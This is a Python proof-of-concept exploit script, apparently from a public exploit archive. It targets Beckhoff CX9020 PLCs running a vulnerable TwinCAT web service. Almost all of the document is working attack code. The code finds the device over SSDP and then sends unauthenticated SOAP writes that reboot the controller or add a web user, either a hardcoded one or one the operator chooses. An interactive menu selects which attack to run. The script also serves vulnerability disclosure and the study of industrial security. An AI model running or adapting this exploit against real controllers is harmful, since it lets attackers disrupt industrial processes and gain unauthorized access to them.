Beckhoff CX9020 CPU Module - Remote Code Execution

#!/usr/bin/env python
'''
    # Exploit Title: Beckhoff CX9020 CPU Module Web Exploit (RCE)
    # Date: 2015-10-22
    # Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be, based on work by Frank Lycops (frank.lycops@thesecurityfactory.be)
    # Vendor Homepage: https://www.beckhoff.com/english.asp?embedded_pc/cx9020.htm
    # Version: TwinCat UpnpWebsite < 3.1.4018.13, fixed with ftp://ftp.beckhoff.com/software/embPC-Control/CX90xx/CX9020/CE/TC3/CX9020_CB3011_WEC7_HPS_v602i_TC31_B4018.13.zip
    # Tested on: Python runs on any Windows or Linux
    # CVE : CVE-2015-4051 (similar to this CVE, but different service IPC Diagnostics Authentication <> Web Authentication)

    Copyright 2015 Photubias(c)

    Written for Howest(c) University College, Ghent University, XiaK

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

File name CX9020-WebControl.py
written by tijl[dot]deneut[at]howest[dot]be
This POC allows to reboot any CX9020 PLC and add random (Web) users to be configured.
 -> Test by going to http://<IP>/config (redirects to http://<NAME>:5120/UpnpWebsite/index.htm)
 -> Default credentials are guest/1 and webguest/1, but this exploit works without credentials
 -> Verify Website version by logging into http://<IP>/config and clicking "TwinCAT"
'''
import sys, httplib, socket, re, base64

## Defining Functions first:
def rebootMachine(UNS, IP, IO):
        ## This is the SOAP Message:
        SoapMessage = "<?xml version=\"1.0\" encoding=\"utf-8\"?><s:Envelope s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\">"
        SoapMessage += "<s:Body><u:Write xmlns:u=\"urn:beckhoff.com:service:cxconfig:1\"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup>"
        SoapMessage += "<IndexOffset>-" + IO + "</IndexOffset>"
        SoapMessage += "<pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>"

        ## Construct and send the HTTP POST header
        rebootwebservice = httplib.HTTP(IP + ":5120")
        rebootwebservice.putrequest("POST", "/upnpisapi?uuid:" + UNS + "+urn:beckhoff.com:serviceId:cxconfig")
        rebootwebservice.putheader("Host", IP + ":5120")
        rebootwebservice.putheader("User-Agent", "Tijls Python Script")
        rebootwebservice.putheader("Content-type", "text/xml; charset=utf-8")
        rebootwebservice.putheader("Content-length", "%d" % len(SoapMessage))
        rebootwebservice.putheader("SOAPAction", "urn:beckhoff.com:service:cxconfig:1#Write")
        rebootwebservice.endheaders()
        rebootwebservice.send(SoapMessage)

        ## Get the response
        statuscode, statusmessage, header = rebootwebservice.getreply()
        if statuscode == 200:
                print "Exploit worked, device should be rebooting!"
                return 1
        else:
                print "Something went wrong, the used index is probably wrong? This is the response code:"
                ## Printing HTTP Response code
                res = rebootwebservice.getfile().read()
                print res
                return 0

        #print "Response: ", statuscode, statusmessage
        #print "headers: ", header

def addUser(UNS, IP, PDATA, IO):
        ## This is the SOAP Message:
        SoapMessage = '<?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
        SoapMessage += '<s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup>'
        SoapMessage += '<IndexOffset>-' + IO + '</IndexOffset>'
        SoapMessage += '<pData>' + PDATA + '</pData></u:Write></s:Body></s:Envelope>'

        ## Construct and send the HTTP POST header
        rebootwebservice = httplib.HTTP(IP + ":5120")
        rebootwebservice.putrequest("POST", "/upnpisapi?uuid:" + UNS + "+urn:beckhoff.com:serviceId:cxconfig")
        rebootwebservice.putheader("Host", IP + ":5120")
        rebootwebservice.putheader("User-Agent", "Tijls Python Script")
        rebootwebservice.putheader("Content-type", "text/xml; charset=utf-8")
        rebootwebservice.putheader("Content-length", "%d" % len(SoapMessage))
        rebootwebservice.putheader("SOAPAction", "urn:beckhoff.com:service:cxconfig:1#Write")
        rebootwebservice.endheaders()
        rebootwebservice.send(SoapMessage)

        ## Get the response
        statuscode, statusmessage, header = rebootwebservice.getreply()
        if statuscode == 200:
                print "Exploit worked, user is added!"
                return 1
        else:
                print "Something went wrong, the used index is probably wrong? This is the response code:"
                ## Printing HTTP Response code
                res = rebootwebservice.getfile().read()
                print res
                return 0

        #print "Response: ", statuscode, statusmessage
        #print "headers: ", header

def addOwnUser(UNS, IP, IO):
        ## This will prompt for username and password and then create the custom pData string
        USERNAME = raw_input("Please enter the username: ")
        PASSWORD = raw_input("Please enter the password: ")
        CONCATENATED = USERNAME + PASSWORD        
        
        # Creating the Full String to encode
        FULLSTRING = chr(16+len(CONCATENATED))
        FULLSTRING += chr(0)+chr(0)+chr(0)
        FULLSTRING += chr(len(USERNAME))
        FULLSTRING += chr(0)+chr(0)+chr(0)+chr(0)+chr(0)+chr(0)+chr(0)
        FULLSTRING += chr(len(PASSWORD))
        FULLSTRING += chr(0)+chr(0)+chr(0)
        FULLSTRING += CONCATENATED

        # Encode a first time, but we don't want any '=' signs in the encoded version
        PDATA = base64.b64encode(FULLSTRING)
        if PDATA.endswith('='):
                FULLSTRING += chr(0)
                PDATA = base64.b64encode(FULLSTRING)
        if PDATA.endswith('='):
                FULLSTRING += chr(0)
                PDATA = base64.b64encode(FULLSTRING)

        # Now we have the correct PDATA string
        print 'We will use this string: '+PDATA
        return addUser(UNS, IP, PDATA, IO)

def is_ipv4(ip):
	match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", ip)
	if not match:
		return False
	quad = []
	for number in match.groups():
		quad.append(int(number))
	if quad[0] < 1:
		return False
	for number in quad:
		if number > 255 or number < 0:
			return False
	return True

###### START PROGRAM #######
if not len(sys.argv) == 2:
        IP = raw_input("Please enter the IPv4 address of the Beckhoff PLC: ")
else:
        IP = sys.argv[1]
        
if not is_ipv4(IP):
	print "Please go read RFC 791 and then use a legitimate IPv4 address."
	sys.exit()

## Initialize variables
UNS = ''
ActiveRebootIndOff = '1329528576' # Active means active Engineering Licenses (when PLC has been programmed less than a week ago)
InactiveRebootIndOff = '1330577152'
ActiveUserIndOff = '1339031296'
InactiveUserIndOff = '1340079872'

print 'Finding the unique UNS (UUID) of the target system (' + IP + '), hold on...\n'

DISCOVERY_MSG = ('M-SEARCH * HTTP/1.1\r\n' +
                 'HOST: 239.255.255.250:1900\r\n' +
                 'MAN: "ssdp:discover"\r\n' +
                 'MX: 3\r\n' +
                 'ST: upnp:rootdevice\r\n' +
                 '\r\n')

SOCK = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
SOCK.settimeout(10)
SOCK.sendto(DISCOVERY_MSG, (IP, 1900))
try:
        RESPONSE = SOCK.recv(1000).split('\r\n')
except:
        print 'Something went wrong, is the system online?\nTry opening http://' + IP + ':5120/config\n'
        raw_input('Press Enter to continue...')
        sys.exit(0)

for LINE in RESPONSE:
        if ':uuid' in LINE:
                UNS = LINE[9:45]
                print 'Got it: ' + LINE[9:45] + '\n'
SOCK.close()

if not UNS:
        print '\n\nProblem finding UNS, this is full SSDP response: \n'
        for LINE in RESPONSE: print LINE
        input('Press Enter to continue...')
        sys.exit(0)
else:
        print 'Let\'s go, choose your option:'
        print '1 = reboot PLC'
        print '2 = add user tijl with password xiak'
        print '3 = add user from your choosing'
        usr_input = raw_input('Select a number: ')
        if usr_input == '1':
                if not rebootMachine(UNS, IP, InactiveRebootIndOff):
                        rebootMachine(UNS, IP, ActiveRebootIndOff)
                raw_input('Press Enter to continue...')
        elif usr_input == '2':
                if not addUser(UNS, IP, 'GAAAAAQAAAAAAAAABAAAAHRpamx4aWFr', InactiveUserIndOff):
                        addUser(UNS, IP, 'GAAAAAQAAAAAAAAABAAAAHRpamx4aWFr', ActiveUserIndOff)
                raw_input('Press Enter to continue...')
        elif usr_input == '3':
                if not addOwnUser(UNS, IP, InactiveUserIndOff):
                        addOwnUser(UNS, IP, ActiveUserIndOff)
                raw_input('Press Enter to continue...')
        else:
                print 'Please choose a sensible input next time, exiting.'
                input('Press Enter to continue...')
                sys.exit()